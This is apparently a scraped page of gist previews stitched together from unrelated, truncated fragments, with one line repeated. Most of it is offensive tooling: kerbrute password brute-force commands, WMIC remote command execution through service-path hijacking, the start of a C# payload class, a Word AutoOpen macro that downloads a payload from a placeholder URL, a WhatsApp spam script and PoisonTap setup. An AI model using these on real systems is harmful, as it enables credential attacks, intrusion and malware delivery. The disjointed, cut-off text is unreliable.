With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| #!/bin/bash | |
| # | |
| # By: Brady Shea - 10FEB2020 | |
| # | |
| # Usage (ip4 only): | |
| # geoip2lookup IP_ADDRESS | |
| # | |
| # ** Install GeoIP Tool and Updater ** | |
| # | |
| # sudo add-apt-repository ppa:maxmind/ppa |
| # This code was written by Chananel Gerstensang.Contact: chananelg@gmail.com, | |
| # Linkedin: https://www.linkedin.com/in/chananel-gerstensang-21a31b157 | |
| # Github: https://github.com/ChananelCode | |
| # Enjoy! | |
| import requests | |
| counter_Domains = 0 | |
| Domains_List = open("./DomainsList.txt", "r").read().split() |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.IO.Compression; | |
| using System.Runtime.InteropServices; | |
| public class Payload | |
| { | |
| public Payload() |
| document.getElementsByClassName("input")[1].innerHTML="This message was written via JS script! "; // Fills the text box message | |
| var input = document.getElementsByClassName("icon btn-icon icon-send");//Grabs the send button | |
| input[0].click();// Clicks the send button |
| // Are you new to Javascript? | |
| //Just copy, open firefox (did not work on Google Chrome for me) | |
| //press f12, go console tab, paste, change according to instructions and press enter | |
| //Thank you rafaelxavierborges for providing the message sending code | |
| //I have just turned it into a spammer that counts from 0 and send the next number every second | |
| var t=0; //what is the first number you want to send | |
| var i=1; //delay in seconds | |
| setInterval(function(){ | |
| window.InputEvent = window.Event || window.InputEvent; | |
| var d = new Date(); |
| Sub AutoOpen() | |
| Auto_Open | |
| End Sub | |
| Sub Auto_Open() | |
| payloadURL = "<Download URL>" | |
| Dim req: Set req = CreateObject("Microsoft.XMLHTTP") | |
| Dim payloadStream: Set payloadStream = CreateObject("Adodb.Stream") | |
| req.Open "GET", payloadURL, False | |
| req.Send |
| ##Server: | |
| sudo apt-get update && apt-get upgrade | |
| sudo apt-get install screen nodejs nodejs-legacy git npm | |
| sudo npm install websocket | |
| git clone https://github.com/samyk/poisontap | |
| screen | |
| sudo node backend_server.js | |
| ##piZero: | |
| sudo apt-get update && apt-get upgrade |